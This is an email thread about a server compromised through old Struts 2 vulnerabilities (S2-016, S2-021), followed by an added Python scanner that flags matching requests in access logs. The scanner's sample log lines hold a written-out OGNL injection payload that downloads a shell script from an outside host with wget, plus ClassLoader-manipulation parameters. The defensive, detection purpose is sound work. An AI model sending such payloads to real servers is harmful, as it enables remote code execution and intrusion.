Cédric,

On 5/1/14, 10:00 AM, Cédric Couralet wrote:
> 2014-04-30 19:07 GMT+02:00 Christopher Schultz <ch...@christopherschultz.net>:
>> Leonardo,
>>
>> On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
>>> I'm uploading my logfiles so they will be available when finished uploading.
>>
>> Remember to get a thread dump while Runtime.exec() is running.
>>
>> You should copy the script /tmp/4.sh somewhere else so you have a copy in case the attacker tries to clean up after themselves. That's certainly what's doing the evil work.
>>
>> You could probably set up iptables or something to restrict outgoing requests so that the attack can't progress across your network.
>>
>>> Regarding the configuration, it's working in two other sites without problem, and there is no problem putting L4 balancing with haproxy.
>>>
>>> I have asked developers about that exploit, still without answer.
>>
>> You appear to be using struts2 2.1.8, which is in the range of versions vulnerable to this bug. There is a workaround that you can probably apply: http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last section on this page).
>>
>> Of course, the vulnerability doesn't allow you to simply inject code or anything like that: you can certainly mess around with code that is already available on the site, though.
>
> I think S2-021 can be used to inject code. There is a POC circulating proving it. That said, this struts version (2.1.8) is also vulnerable to http://struts.apache.org/release/2.3.x/docs/s2-016.html which permits code execution very easily. Ouch.

Yeah, there's always that ;)

-chris
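The thread names two Struts 2 advisories, S2-016 (OGNL evaluated from the action:/redirect:/redirectAction: parameter prefixes) and S2-021 (ClassLoader manipulation through parameter names that reach the class property, the thing the excludeParams workaround on the linked page is meant to block), and Chris's first instinct is to look at the logs and preserve evidence. The following is an added example for this thread, not code from Struts, Tomcat or any of the posters: a small Python scanner that walks access-log lines and flags requests with either exploit shape. It assumes the combined log format; the log lines, client addresses and payloads are constructed for the example, and the CLASS_NAV pattern is my own illustration of the kind of parameter name the S2-021 workaround excludes, not the regex from the advisory.

```python
"""Scan access-log lines for the Struts 2 request shapes discussed in the thread.

Added example for this thread, not code from Struts, Tomcat or any poster. It
looks for two things: the action:/redirect:/redirectAction: prefixes that
S2-016 (Struts < 2.3.15.1) evaluated as OGNL, and parameter names that walk
into the 'class' property, the ClassLoader manipulation closed by S2-020 and
re-closed by S2-021. The log lines below are constructed for the example.
"""
import re
from urllib.parse import unquote

# Combined log format (assumed): client ident user [ts] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# S2-016: parameter-name prefixes that old Struts 2 versions fed to OGNL.
S2_016_PREFIX = re.compile(r'^(action|redirect|redirectAction):', re.IGNORECASE)
# Tokens that mark an OGNL expression once the parameter is URL-decoded.
OGNL_MARKER = re.compile(r'\$\{|%\{|#_memberAccess|#context|ProcessBuilder')

# S2-020/S2-021: names that reach 'class' as a property, in any case and through
# bracket syntax too (class.classLoader, Class.classLoader, foo.class['classLoader']).
# Illustrative pattern for this example; it is not the excludeParams regex from the advisory.
CLASS_NAV = re.compile(r"""(^|\.|\[['"])class(\.|\[|['"]\])""", re.IGNORECASE)

# Constructed sample: one S2-016 style request, two S2-020/S2-021 style requests
# (note the capitalised 'Class', the S2-020 filter bypass), and two benign requests.
CONSTRUCTED_LOG_LINES = [
    '203.0.113.5 - - [30/Apr/2014:12:31:07 +0200] "GET /app/index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22/bin/sh%22,%22-c%22,%22wget%20http://203.0.113.99/4.sh%20-O%20/tmp/4.sh%22})).start()} HTTP/1.1" 302 0',
    '203.0.113.5 - - [30/Apr/2014:12:31:09 +0200] "GET /app/index.action?class.classLoader.resources.dirContext.docBase=/tmp HTTP/1.1" 200 512',
    '203.0.113.5 - - [30/Apr/2014:12:31:11 +0200] "GET /app/index.action?Class.classLoader.resources.dirContext.docBase=/tmp HTTP/1.1" 200 512',
    '198.51.100.7 - - [30/Apr/2014:12:32:00 +0200] "GET /app/index.action?id=42&page=2 HTTP/1.1" 200 7401',
    '198.51.100.7 - - [30/Apr/2014:12:32:05 +0200] "POST /app/login.action HTTP/1.1" 200 2210',
]


def parse_query(target):
    """Split the query string of a request target into decoded (name, value) pairs.

    Everything after '?' is kept (no fragment handling: a literal '#' in a request
    line is part of the payload, not a fragment), and each piece is decoded twice so
    a double-encoded payload (%2524 -> %24 -> $) is seen in clear.
    """
    query = target.partition('?')[2]
    pairs = []
    for part in query.split('&'):
        if not part:
            continue
        name, _, value = part.partition('=')
        pairs.append((unquote(unquote(name)), unquote(unquote(value))))
    return pairs


def classify_params(pairs):
    """Return the set of advisory ids whose exploit shape appears in the pairs."""
    hits = set()
    for name, value in pairs:
        # The OGNL payload may be split across name and value by a literal '='.
        if S2_016_PREFIX.search(name) and OGNL_MARKER.search(name + '=' + value):
            hits.add('S2-016')
        if CLASS_NAV.search(name):
            hits.add('S2-020/S2-021')
    return hits


def scan_log(lines):
    """Return one finding per request line that matches an exploit shape."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format; a real tool would count these
        advisories = classify_params(parse_query(m['target']))
        if advisories:
            findings.append({'client': m['client'], 'ts': m['ts'],
                             'target': m['target'], 'advisories': advisories})
    return findings


if __name__ == '__main__':
    for f in scan_log(CONSTRUCTED_LOG_LINES):
        print(f"{f['ts']} {f['client']} {sorted(f['advisories'])} {f['target'][:80]}")
```

Two caveats when pointing this at real logs. The S2-016 check only fires when a prefixed parameter also carries an OGNL marker, because redirect:/redirectAction: were a documented feature that a legitimate application might use; if yours never uses them, flag the bare prefix as well. And decoding twice catches double-encoded payloads at the cost of misreading a legitimate value that contains a literal %25, which is rare enough in parameter names to be acceptable for triage.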